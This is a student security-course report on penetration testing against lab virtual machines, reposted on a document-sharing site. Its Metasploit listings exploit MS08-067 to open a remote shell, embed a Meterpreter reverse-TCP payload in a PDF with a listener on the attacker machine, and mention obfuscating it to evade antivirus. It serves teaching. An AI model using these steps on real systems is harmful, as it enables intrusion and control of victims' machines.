MIEIC - SSIN (Computer Security)



Similar documents
Penetration Testing with Kali Linux

Metasploit Beginners

Penetration Testing Workshop

1. LAB SNIFFING LAB ID: 10

Metasploit Lab: Attacking Windows XP and Linux Targets

Vulnerability Assessment and Penetration Testing

60467 Project 1. Net Vulnerabilities scans and attacks. Chun Li

NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

AUTHOR CONTACT DETAILS

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

1 Scope of Assessment

Penetration Testing Report Client: Business Solutions June 15 th 2015

Learn Ethical Hacking, Become a Pentester

Armitage. Part 1. Author : r45c4l Mail : infosecpirate@gmail.com.

INFORMATION SECURITY TRAINING CATALOG (2015)

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

Exploiting Transparent User Identification Systems

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

An Introduction to Nmap with a Focus on Information Gathering. Ionuț Ambrosie

Penetration Testing. What Is a Penetration Testing?

VULNERABILITY ASSESSMENT WHITEPAPER INTRODUCTION, IMPLEMENTATION AND TECHNOLOGY DISCUSSION

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

CYBERTRON NETWORK SOLUTIONS

Penetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.

How to hack a website with Metasploit

CRYPTUS DIPLOMA IN IT SECURITY

Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!

INDUSTRIAL CONTROL SYSTEMS CYBER SECURITY DEMONSTRATION

Professional Penetration Testing Techniques and Vulnerability Assessment ...

Tools for penetration tests 1. Carlo U. Nicola, HT FHNW With extracts from documents of : Google; Wireshark; nmap; Nessus.

Security of IPv6 and DNSSEC for penetration testers

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details


INTRODUCTION: PENETRATION TEST A BUSINESS PERSPECTIVE:

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks

SY system so that an unauthorized individual can take over an authorized session, or to disrupt service to authorized users.

SECURING APACHE : DOS & DDOS ATTACKS - II

Pwning Intranets with HTML5

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. Chapter 4 Finding Network Vulnerabilities

Ethical Hacking as a Professional Penetration Testing Technique

How-to: DNS Enumeration

CYBER ATTACKS EXPLAINED: PACKET CRAFTING

EC-Council Certified Security Analyst (ECSA)

Certified Cyber Security Expert V Web Application Development

Metasploit The Elixir of Network Security

McAfee Certified Assessment Specialist Network

Topics in Network Security

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Attack Frameworks and Tools

Vulnerability analysis

Ethical Hacking and Information Security. Foundation of Information Security. Detailed Module. Duration. Lecture with Hands On Session: 90 Hours

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

CIT 380: Securing Computer Systems

Web App Security Audit Services

NETWORK SECURITY WITH OPENSOURCE FIREWALL

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

This session was presented by Jim Stickley of TraceSecurity on Wednesday, October 23 rd at the Cyber Security Summit.

Firewalls and Software Updates

A New Era. A New Edge. Phishing within your company

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE)

Port Scanning and Vulnerability Assessment. ECE4893 Internetwork Security Georgia Institute of Technology

FREQUENTLY ASKED QUESTIONS

Using Nessus In Web Application Vulnerability Assessments

Introduction. Nmap from an Ethical Hacker's View Part 1. By Kirby Tucker

An Introduction to Network Vulnerability Testing

1. Introduction. 2. DoS/DDoS. MilsVPN DoS/DDoS and ISP. 2.1 What is DoS/DDoS? 2.2 What is SYN Flooding?

A43. Modern Hacking Techniques and IP Security. By Shawn Mullen. Las Vegas, NV IBM TRAINING. IBM Corporation 2006

Project Proposal Active Honeypot Systems By William Kilgore University of Advancing Technology. Project Proposal 1

Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)

A Study on the Security aspects of Network System Using Penetration Testing

Cybercrime myths, challenges and how to protect our business. Vladimir Kantchev Managing Partner Service Centrix

Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst

SAST, DAST and Vulnerability Assessments, = 4

Redhawk Network Security, LLC Layton Ave., Suite One, Bend, OR

Protecting Your Organisation from Targeted Cyber Intrusion

WHITE PAPER. An Introduction to Network- Vulnerability Testing

NETWORK PENETRATION TESTING

Course Content: Session 1. Ethics & Hacking

National Cyber League Certified Ethical Hacker (CEH) TM Syllabus

Penetration Testing. Security Testing

HoneyBOT User Guide A Windows based honeypot solution

Virtual Learning Tools in Cyber Security Education

Information Security. Training

Secure Software Programming and Vulnerability Analysis

Introduction to Network Security Lab 2 - NMap

Host Discovery with nmap

Audience. Pre-Requisites

(maybe?)apt1: technical backstage

Kautilya: Teensy beyond shells

Network Security Monitoring and Behavior Analysis Pavel Čeleda, Petr Velan, Tomáš Jirsík

Penetration Testing SIP Services

Banking Security using Honeypot

Firewalls, Tunnels, and Network Intrusion Detection

Transcription:

MIEIC - SSIN (Computer Security) Tomé Duate, Robert Kulzer Final report Group 5, T9 2011/2012 December 6, 2011 1 Introduction There are numerous studies on malware development over the past decade, they all show a rapidly growth over the last years. Please refer to figure 1 for one of the malware statistics. Figure 1: Number of Entries on the Google Safe Browsing Malware List Many software developers do not pay much attention on possible security flaws while developing applications. A common mistake is to think security can be implemented later on as well. But writing a robust code means to start thinking about security from the beginning to the end. 1

2 Goals In this project we what to create an awareness among our fellow students to write secure code by showing how software can be exploited. We want to provide knowledge on certain tools to check for vulnerabilities, starting at the network layer to the application layer. Moreover, we want explain the value of penetration testing and its crucial value for today s companies. We want to explain the general guidelines of a penetration tester [1]. 1. Pre-engagement Interactions 2. Intelligence Gathering 3. Threat Modeling 4. Vulnerability Analysis 5. Exploitation 6. Post Exploitation 7. Reporting As penetration tests are either conducted as Black box and/or White box tests, we want to explain and outline the differences between these two paradigms. Furthermore, we will provide information on noteworthy web sites to get more involved in the matter. In addition to that, there is a large variety of security tools any interested student should be aware of and may want to try. All this information will be included in this work. We intend to state the legal concerns which one has to take into account before starting a penetration test. 2

3 Approach The attacked machines in this demonstration are virtual machines. It is a close to real world example without harming actual machines. All the demonstration is done along the penetration guideline introduced in section goals 2. The first machine is a Windows XP standard installation with service pack 3 installed. The machine is called WinXPSP3. The other machine is a Windows 7 standard installation with service pack 1. This example should demonstrate, that even newer systems can be compromised. The machine is called Win7. In both cases the attack is in the same network as the victim, there is no Firewall, VPN, IDS, or what so ever shielding the targets. 3.1 Metasploit Many penetration testers use security frameworks for their work. They provide a more convenient and efficient way to manage scans and vulnerabilities. Thanks to security frameworks, certain tasks can be performed much faster. Metasploit is such a framework [2], it is open-source and is used to retrieve information on vulnerabilities on targeted systems. 3.2 Other software Armitage is a GUI to the Metasploit framework [3] nmap is a free and open source utility for network exploration or security auditing [4] whois stores registered users or assignees of an Internet resource (like domain name, IP address, and so on) host a DNS lookup utility. telnet a network protocol to connect to specified ports on a remote host and many more... 4 Getting in touch with the target 4.1 Pre-engagement Interactions The Penetration Tester s Guide [1] defines this stage as the negotiation point. Here the security engineer and a the client meet and discuss the terms of the security evaluation. The point of this contract is to define the goal of the endeavour. Furthermore the penetration tester may decide for Black box and/or White box test. The Black box test is performed without knowledge of the internal structure/routines of the targeted system. They are mainly used to test if the specifications are implemented in the way they are 3

meant to be. In manners of penetration testing, this test is considered a real world example. On the contrary is the White box test, here the internals are known. Thus, the penetration tester can launch more wide scale tests against a system from the inside. This approach simulates an malicious actor from the inside, who has the authorization to access sensitive areas which are guarded by various mechanisms. The hybrid method, sometimes refereed to as Grey box testing assumes the security engineer as some knowledge on the internals, but does not have credentials to obtain higher security clearance. This level can be achieved after gathering intelligence on the targeted system, while still be at a basic user level. According to the company policies, it may be interesting to keep the employees (also IT department) unaware of a penetration test. Figure 2: Black and White box testing 4.2 Intelligence Gathering In this stage the penetration tester is trying to gather as much information on the targeted system as possible. The more information he gathers, the more elaborate his attacks/results can be. Common techniques are fingerprinting on hosts, Google hacking, social engineering and so on. The security engineer wants to identify the defence systems within the network, such as Intrusion Detection Systems (IDS) [6], Firewalls, Honeypots [5] and such. Depending on the strategy, the penetration tester may want to be as noisy as possible to attract attention or silent to stay undetected from the radar of the defence systems. He could also try to combine those strategies to distract the defence systems from the actual attack using different IP ranges and heavy port scans. There are numerous scenarios to perform the penetration testing. The attacker may select appropriate measures depending on the given configuration of the network. # nmap ss PN WinXPSP3 S t a r t i n g Nmap 5.21 ( http : / /nmap. org ) Nmap scan r e p o r t f o r WinXPSP3 Host i s up ( 0. 0 0 1 0 s l a t e n c y ). Not shown : 997 c l o s e d p o r t s PORT STATE SERVICE 135/ t c p open msrpc 139/ tcp open netbios ssn 4

445/ tcp open microsoft ds MAC Address : 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : B6 (Cadmus Computer Systems ) Listing 1: Default nmap scan on single host In a very basic nmap scan on WinXPSP3 (refer to listing 1 the output provides information on the open ports. This gives him a basic idea which services on a machine are running and have possible flaws. The option -ss uses TCP SYN as connection attempt (no actual connection is established) and -PN skips host discovery assuming host as online. These to switches provide a very basic method to stay a little bit more silent. If nmap would be used without any options, a connection would be established, hence the scanned hosts process would most certainly be aware of a connection attempt. There are more elaborate approaches to minimize the noise. With so called TCP idle scan the attacker can spoof a a IP address of another host in the network. Thus, he can evade detection. In order to perform this method, one has to identify hosts in the network who incremental IP ID (packet fragment identification number) enabled. The metasploit framework comes with such a scanner. The action is shown in listing 2. msf > use a u x i l i a r y / scanner / ip / i p i d s e q msf a u x i l i a r y ( i p i d s e q ) > s e t RHOSTS 1 9 2. 1 6 8. 5 6. 0 / 2 4 msf a u x i l i a r y ( i p i d s e q ) > s e t THREADS 50 msf a u x i l i a r y ( i p i d s e q ) > run [ ] Scanned 045 o f 256 h o s t s (017% complete ) [ ] Scanned 086 o f 256 h o s t s (033% complete ) [ ] Scanned 095 o f 256 h o s t s (037% complete ) [ ] 1 9 2. 1 6 8. 5 6. 1 0 1 s IPID sequence c l a s s : Incremental!... [ ] A u x i l i a r y module e x e c u t i o n completed msf a u x i l i a r y ( i p i d s e q ) > nmap PN s I 1 9 2. 1 6 8. 5 6. 1 0 1 WinXPSP3 Listing 2: Metasploit TCP idle scan Listing 2 shows that the host with IP address 192.168.56.101 is a valid candidate for TCP idle scan. The option -si tells nmap that the following hostname or IP address is a so called zombie host, used for the scan. Listing 3 shows another useful option of nmap -A to gather more information on a target system. Not just the fingerprint of the OS running on the target, but also if there are routers in between (HOP = 1). # nmap ss PN A WinXPSP3 S t a r t i n g Nmap 5.21 ( http : / /nmap. org ) at 2011 11 12 18:59 WET Nmap scan r e p o r t f o r WinXPSP3 Host i s up ( 0. 0 0 1 4 s l a t e n c y ). Not shown : 997 c l o s e d p o r t s PORT STATE SERVICE VERSION 135/ tcp open msrpc M i c r o s o f t Windows RPC 139/ tcp open netbios ssn 445/ tcp open microsoft ds M i c r o s o f t Windows XP microsoft ds 5

MAC Address : 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : B6 (Cadmus Computer Systems ) Device type : g e n e r a l purpose Running : M i c r o s o f t Windows XP OS d e t a i l s : M i c r o s o f t Windows XP SP2 or SP3 Network Distance : 1 hop S e r v i c e I n f o : OS: Windows Host s c r i p t r e s u l t s : n b s t a t : NetBIOS name : HACKME, NetBIOS user : <unknown>, NetBIOS MAC: 0 8 : 0 0 : 2 7 : 1 8 : 2 2 : smb os d i s c o v e r y : OS: Windows XP ( Windows 2000 LAN Manager ) Name : WORKGROUP\HACKME System time : 2011 11 15 1 8 : 5 9 : 3 8 UTC+1 smbv2 enabled : Server doesn t support SMBv2 p r o t o c o l HOP RTT ADDRESS 1 1.38 ms 1 9 2. 1 6 8. 5 6. 1 0 2 OS and S e r v i c e d e t e c t i o n performed. Listing 3: Nmap OS discovery But there is not just nmap as a tool to gather information on the network and the hosts. Classic UNIX tools like whois, host and ethercap, but also capable network sniffers like wireshark [7] and openvas [8] to serve the penetration tester on gathering intelligence. In listing 4 the whois output of up.pt is shown. This information does at first glance not seem to be of any value to a penetration tester. But the mail server and DNS addresses could be already identified, without even making contact with any of the up.pt hosts. These informations are especially vital, if a security engineer is to evaluate in a Black box scenario. # host t mx up. pt up. pt mail i s handled by 20 r e l a y 2. up. pt. up. pt mail i s handled by 10 r e l a y 1. up. pt. # whois up. pt T i t u l a r / R e g i s t r a n t Universidade do Porto R e i t o r i a P r a a Gomes T e i x e i r a Porto 4099 002 Porto Email : contacto dnsup@reit. up. pt.... Nameserver Information Nameserver : up. pt NS dns1. up. pt.... Nameserver : dns3. up. pt. A 1 9 3. 1 3 7. 3 5. 1 0 0 Nameserver : dns4. up. pt. A 1 9 3. 1 3 6. 3 7. 1 0 6

... Nameserver : dns3. up. pt. AAAA 2 0 0 1 : 6 9 0 : 2 2 0 0 : b10 : : 1 0 0 Listing 4: Host and whois queries on up.pt 5 Pin-point the target system 5.1 Threat Modeling In this stage the attacker will isolate the most promising approach. He will try to look for the most effective attack according to the given specifications made in section Pre-engagement Interactions 4.1. Here the penetration tester works as an adversary would try to penetrate the system. The identification of vulnerabilities and security flaws in a system is not an easy task. As in the previous section 4.2 explained, the attacker has to operate cautiously. The security engineer knows about which ports are open. Now he wants to learn more about which software uses this port and which version of this program. Listing 5 shows an example how to identify a web server software and it s version. The output states Apache version 2.2.3, as well the server runs on Linux with the SuSE Linux distribution. This output can be cross checked with the findings from OS fingerprinting. # t e l n e t www. f e. up. pt 80 Trying 1 9 3. 1 3 6. 2 8. 2 0 5... Connected to s i f e u p. f e. up. pt ( 1 9 3. 1 3 6. 2 8. 2 0 5 ). Escape c h a r a c t e r i s ˆ ]. GET / index. html HTTP/ 1.1 HTTP/ 1. 1 400 Bad Request Date : Sat, 12 Nov 2011 1 4 : 2 5 : 3 4 GMT Server : Apache / 2. 2. 3 ( Linux /SUSE) Content Length : 226 Connection : c l o s e Content Type : t e x t /html ; c h a r s e t=i s o 8859 1 Listing 5: Determine the web server version Having this information, the attacker may proceed to web pages like www.exploit-db.com to obtain informations on recently discovered vulnerabilities in Apache version 2.2.3 or he could search with metasploit. Yet another way to discover vulnerabilities is to use nmap scripts. Nmap can also scan for certain vulnerabilities on hosts. Moreover, the nmap script engine (NSE) [10] can be easily developed by users and are publicly available. Listing 6 shows an smb scan on a WinXPSP3. The output yields a MS08-67 vulnerability [9]. This critical flaw allows remote code execution. This attack provides the attacker to gain remote access, hence compromising the entire system. # nmap A ss PN WinXPSP3 s c r i p t=smb check vulns... 7

NSE: S c r i p t Scanning completed. Nmap scan r e p o r t f o r WinXPSP3 Host i s up ( 0. 0 0 1 3 s l a t e n c y ).... Device type : g e n e r a l purpose Running : M i c r o s o f t Windows XP OS d e t a i l s : M i c r o s o f t Windows XP SP2 or SP3 Network Distance : 1 hop S e r v i c e I n f o : OS: Windows Host s c r i p t r e s u l t s : smb check vulns : MS08 067: LIKELY VULNERABLE Conficker : L i k e l y CLEAN r e g s v c DoS : CHECK DISABLED SMBv2 DoS (CVE 2009 3103): CHECK DISABLED Listing 6: Nmap smb vulnerability scan 5.2 Vulnerability Analysis Is concerned with the question on how to gain access to the system. In this stage the security engineer puts his data together he gathered up to this point to develop to most effective method to execute the attack. As for this work, we select the MS08-067 exploit, as it grants total access to the system. 6 Exploitation Process 6.1 Exploitation After careful planing and information gathering the actual attack can be carried out. Unlike as in section Intelligence Gathering 4.2 pointed out, the attacker should proceed as silent as possible. Massive and random launches of exploits are usually not the way to go in this stage. Listing 7 shows how easily remote access can be obtained using the metasploit framework. In this scenario the command-line version of metasploit is used. At first, the IPv4 address of the attackers machine is set. The payload is the remote code which will be executed abusing the vulnerability. In this case the payload is a remote shell listening on port 4444 on the victims machine. In the next step, the MS08-067 vulnerability is searched, via the search engine provided by the metasploit framework. After locating the right vulnerability, it s being loaded and now the penetration tester may configure the attack further 8

The available parameters can be viewed by showing the options. The required fields are marked and have to be provided. After setting up all the essential parameters the actual exploit can be started. msf > s e t LHOST 1 9 2. 1 6 8. 5 6. 1 < Attacking machine LHOST => 1 9 2. 1 6 8. 5 6. 1 msf > s e t PAYLOAD windows/ s h e l l / bind tcp PAYLOAD => windows/ s h e l l / bind tcp msf > search ms08 067 Matching Modules ================ Name D i s c l o s u r e Date Rank D e s c r i p t i o n e x p l o i t /... / ms08 067 netapi 2008 10 28 g r e a t M i c r o s o f t... msf > use e x p l o i t /windows/smb/ ms08 067 netapi msf e x p l o i t ( ms08 067 netapi ) > show o p t i o n s Module o p t i o n s ( e x p l o i t /windows/smb/ ms08 067 netapi ) : Name Current S e t t i n g Required D e s c r i p t i o n RHOST yes The t a r g e t address RPORT 445 yes Set the SMB s e r v i c e port SMBPIPE BROWSER yes The pipe name... Payload o p t i o n s ( windows/ s h e l l / bind tcp ) : Name Current S e t t i n g Required D e s c r i p t i o n EXITFUNC thread yes Exit technique : seh,... LPORT 4444 yes The l i s t e n port RHOST no The t a r g e t address Exploit t a r g e t : Id Name 0 Automatic Targeting msf e x p l o i t ( ms08 067 netapi ) > s e t RHOST WinXPSP3 RHOST => WinXPSP3 9

msf e x p l o i t ( ms08 067 netapi ) > s e t t a r g e t 6 t a r g e t => 6 msf e x p l o i t ( ms08 067 netapi ) > e x p l o i t [ ] Started bind handler [ ] Attempting to t r i g g e r the v u l n e r a b i l i t y... [ ] Sending s t a g e (240 bytes ) to WinXPSP3 [ ] Command s h e l l s e s s i o n 1 opened ( 1 9 2. 1 6 8. 5 6. 1 : 3 3 0 5 0 > WinXPSP3: 4 4 4 4 ) at 2011 11 12 M i c r o s o f t Windows XP [ Version 5. 1. 2 6 0 0 ] (C) Copyright 1985 2001 M i c r o s o f t Corp. C: \WINDOWS\ system32> Listing 7: Getting remote shell after MS08-067 exploit There are of course numerous payloads to be used. One of the most intriguing one is Meterpreter [11], this payload enables the penetration tester to a wide range of tools and mechanisms to control the client. As the attacker may want to use one or more of the compromised systems as a platform for further attacks inside the network Meterpreter can be a valuable asset to keep control of the attacked systems. 6.1.1 Meterpreter It is short for Meta-Interpreter, a advanced payload for the Metasploit framework. It provides a much easier way to richer feature set for the framework. The alternative would be much assembly code which can be very exhausting. To stay undetected, Meterpreter operates only in memory, thus staying undetected. Figures 3 and 4 show the interface of Armitage. 6.2 Using application exploits Nowadays, operating systems are no longer the main target of malware developers [12]. Injection, XSS and miss configured session management are much more pressing topics for security engineers. In addition to that, social engineering is still one of the most effective ways to compromise a system. Here is an example on embedding malicious code in a benign looking pdf file. When the file is opened with Adobe Reader [13] (version 8.x and 9.x) it executes the malicious code. 6.2.1 Malicious pdf Listing 8 shows the way to create a malicious pdf file, using the Metasploit framework to embed code in a originally legitimate document. 10

Figure 3: Armitage interface, after scanning the network Figure 4: Meterpreter session opened after compromising Win7 msf > search adobe pdf embedded 11

Matching Modules... msf > use e x p l o i t /windows/ f i l e f o r m a t / adobe pdf embedded exe msf... > s e t FILENAME <output path >/buhu m. pdf FILENAME => <output path >/buhu m. pdf msf... > s e t INFILENAME <input path>/iptablesflowchart. pdf INFILENAME => <input path >/IPTablesFlowChart. pdf msf... > s e t LAUNCH MESSAGE Foobar LAUNCH MESSAGE => Foobar msf... > s e t LHOST 1 9 2. 1 6 8. 5 6. 1 LHOST => 1 9 2. 1 6 8. 5 6. 1 msf... > show o p t i o n s Module o p t i o n s ( e x p l o i t /windows/ f i l e f o r m a t / adobe pdf embedded exe ) : Name Current S e t t i n g EXENAME FILENAME <output path>/buhu m. pdf INFILENAME <input path>/iptablesflowchart. pdf LAUNCH MESSAGE Foobar Payload o p t i o n s ( windows/ meterpreter / r e v e r s e t c p ) : Name Current S e t t i n g Required D e s c r i p t i o n EXITFUNC p r o c e s s yes Exit technique : seh,... LHOST 1 9 2. 1 6 8. 5 6. 1 yes The l i s t e n address LPORT 4444 yes The l i s t e n port... msf e x p l o i t ( adobe pdf embedded exe ) > e x p l o i t [ ] Reading i n < input path >/IPTablesFlowChart. pdf... [ ] Parsing <input path>/iptablesflowchart. pdf... [ ] Parsing S u c c e s s f u l. [ ] Using windows/ meterpreter / r e v e r s e t c p as payload... [ ] Creating <output path>/buhu m. pdf f i l e... [+] <output path>/buhu m. pdf... Listing 8: Embedding malicious code in a pdf file using Metasploit The hard part of the penetration testers work is now to convince a victim to open this document in Adobe Reader, which has this vulnerability. Before the victim opens the document, the attacker have to make sure, that a connection handler is waiting for incoming connections, see listing 9. msf e x p l o i t ( adobe pdf embedded exe ) > use e x p l o i t / multi / handler 12

msf e x p l o i t ( handler ) > s e t PAYLOAD windows/ meterpreter / r e v e r s e t c p PAYLOAD => windows/ meterpreter / r e v e r s e t c p msf e x p l o i t ( handler ) > s e t LHOST 1 9 2. 1 6 8. 5 6. 1 LHOST => 1 9 2. 1 6 8. 5 6. 1 msf e x p l o i t ( handler ) > e x p l o i t [ ] Started r e v e r s e handler on 1 9 2. 1 6 8. 5 6. 1 : 4 4 4 4 [ ] S t a r t i n g the payload handler... Listing 9: Generate a generic listener using Metasploit After completing these steps, the penetration tester should see the incoming connection. Please refer to figure 5 to see Meterpreter with Armitage in action. Figure 5: Taking a screenshot from the running compromised machine However, this is a rather simple approach. This attempt would most certainly fail, if the machine would use a virus scanner. Checking the file with the online malware scanner virustotal.com [14] turns out that most of the virus engines can identify this malicious formed pdf document. See figure 6 for the results on the pdf. It is on the other hand not so difficult to prevent the detection by virus scan engines. Obfuscating techniques render them innocuous. 6.3 Post Exploitation After successfully compromised one or more systems, the penetration tester wants to gather valuable information and intelligence. The security engineer wants to expose the most secure systems in the network, the organization is trying to protect the most. In a software company 13

Figure 6: Virustotal scan on the embedded Meterpreter pdf document. this may be there repository. A bank tries to shield of their financial services. These are the systems the penetration tester is after. As it may be easier to compromise a insignificant host first, the penetration tester may use this machine then to continue for more protected systems. Here Metasploit, or more precisely Meterpreter provides options to stay on attacked machines, by for example switching the process used for attack to a other one, to stay undetected. 7 Reporting The organization who hires penetration testers expect them to reveal vulnerabilities in their networks and how they can be exploited. Hence, this stage is one of the most important. It is not just the wholes in the security systems a penetration testers uncovers, but he is also 14

supposed to rise the awareness of the flaws in their configuration, to hinder upcoming attacks. The security engineer will also provide solutions to the discovered vulnerabilities, and if possible to eliminate them on a broader scale. For example, if SQL injections are possible, the input for these instances should be sanitized. But the the underlining problem still remains. He may also show alternatives, if possible to eliminate this problem in total. As for the examples in this work. Most of the vulnerabilities are caused because of outdated applications. These security wholes can be closed rather easily. But there still are numerous possibilities to find entrance to a considered secure environment. 8 Conclusion Even though nowadays many companies and governments invest more money in their IT security departments, the number of news regarding compromised databases, industrial espionage and so on is still rising. Organized crime discovered the huge potential profit in online crime. But also crash kids (aka. script kiddies) and self assigned freedom fighters are a threat for data each one of us wants to protect. Penetration tests can be one instrument to unveil security flaws in networks and systems. These security engineer operate as they were hackers, but they have permission from the organization who hired them. It is most certainly not the magic formula to prevent future attacks. But it rises the level, an attacker would have to surpass, in order to gain access. Professional attackers have a business plan as well as companies. If the amount of resources invested is higher then the expected profit, they most likely will reconsider their attack plans. Hackers how attack for fun or prestige, will also spend more of their time breaking into these systems, previously tested by penetration testers. Furthermore, penetration testers can help rise awareness for vulnerabilities in software but also in social engineering. 15

References [1] David Kennedy, Jim O Gorman, Devon Kearns, and Mati Aharoni Metasploit - The Penetration Tester s Guide. ISBN: 978-1-59327-288-3 [2] Rapid7 LLC Metasploit Framework. http://www.metasploit.com/ [3] Raphael Mudge Cyber attack management for metasploit. http://www.fastandeasyhacking.com/ [4] Gordon Lyon nmap - Discovering hosts and services on a computer network. http://nmap.org/ [5] Provos, N. A virtual honeypot framework. Proceedings of the 13th conference on USENIX Security Symposium-Volume 13 (2004) [6] Rowland, C.H. Intrusion detection system (IDS). US Patent 6,405,318 [7] The Wireshark team Wireshark - The free and open-source packet analyzer. http://www.wireshark.org/ [8] Greenbone Networks GMBH OpenVAS - Framework for vulnerability scanning. http://www.openvas.org/ [9] MS08-067 vulnerability Vulnerability in Server Service Could Allow Remote Code Execution. http://technet.microsoft.com/en-us/security/bulletin/ms08-067 [10] Various developers, initially by nmap developers Nmap scripts to automate a wide variety of networking tasks. http://nmap.org/book/nse.html [11] Metasploit developers Meterpreter - Advanced payloads for Metasploit Framework. http://www.offensive-security.com/metasploit-unleashed/metasploit_about_ Meterpreter [12] Open Web Application Security Project (OWASP) OWASP is an open-source application security project. https://www.owasp.org/index.php/category:owasp_top_ten_project [13] Adobe Systems Adobe Reader - Used to view and print PDF files. http://www.adobe.com/products/reader.html [14] Virustotal.com - Hispasec Sistemas Free checking of suspicious files using multiple antivirus engines. http://www.virustotal.com/ 16

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information